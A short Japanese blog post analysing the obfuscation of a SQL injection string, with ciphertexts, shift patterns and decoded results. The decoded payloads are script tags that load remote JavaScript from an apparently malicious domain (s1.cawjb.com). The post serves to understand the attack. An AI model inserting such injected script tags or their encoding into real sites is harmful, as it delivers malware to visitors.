チャレンジSQL!

話題のSQLインジェクション文字列解読チャレンジしてみました。
はせがわさんとこにあった仮説をもとに。

最終的に

  1. 換字暗号
  2. 10文字で1ブロック
  3. 正負の両方にずれる(asciiコード的に)

までしかわからず。解答はだとは思うけど、パターンにはまらない文字が2文字と正負の判定基準が謎。

追記:
上ののは、お昼休みに携帯から打った(大変だった)ので、帰ってきてからちゃんと書こうと思ったらヤマガタさんがかいてた。大胆にごそっと引用。



[]暗号: <raqmtr$r{c<jwpt<+.z1/absnd*bfm.hs*nu:=&sbpjtp8[]
↓ |+++--+-+-|+--+--++-|-+-+--+++|++-+--+-+|++--++
↓ |121442419|123442417|121442419|123442419|121446 ※差
[]予想: <script src=http://s1.cawjb.com/jp.js></script>[]

[]暗号: <raqmtr$r{c<jwpt<+.z1/absnd*bfm.iq*nu:=&sbpjtp8[]
↓ |+++--+-+-|+--+--++-|-+-+--+++|++-+--+-+|++--++
↓ |121442419|123442417|121442419|121442419|121446 ※差
[]予想: <script src=http://s1.cawjb.com/kr.js></script>[]

※黄色くしたところが、“美しく” なくて、納得できていない部分です。(笑

10文字で1ブロックとして変換テーブルを持ち、繰り返しらしいことはたぶんあってるのですが、気持ち悪い箇所がでてくるのです。
あと、プラス方向かマイナス方向かの基準がすぐには見えてこない。2進数で表してごにょごにょするとかかなぁ(根拠はなし)。めんどうだからやりたくないけどw